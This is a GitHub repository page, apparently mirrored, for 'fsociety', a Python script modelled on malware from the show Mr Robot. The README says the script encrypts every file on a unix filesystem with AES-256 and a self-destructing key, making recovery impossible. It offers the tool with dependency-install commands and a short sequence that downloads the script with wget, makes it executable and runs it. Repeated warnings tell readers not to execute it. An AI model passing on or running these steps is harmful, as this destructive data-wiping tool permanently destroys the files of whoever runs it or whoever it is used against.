Dedsec1 / fsociety

WARNING: do not actually execute this. You will not be able to recover your files

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

fsociety

WARNING: do not actually execute this. You will not be able to recover the files.

This is intended to encrypt every bit of data in a unix filesystem using 256-bit AES with a self-destructing, randomly generated key.

The fuxsocy.py script is based on Darlene's malware shown in Mr Robot

alt-text

Dependencies:

  • python
  • pycrypto
sudo apt install python python-pip
sudo pip install pycrypto

Usage:

wget https://raw.githubusercontent.com/joekendal/fsociety/master/fuxsocy.py
sudo chmod +x fuxsocy.py
./fuxsocy.py

About

WARNING: do not actually execute this. You will not be able to recover your files


Languages

Language:Python 100.0%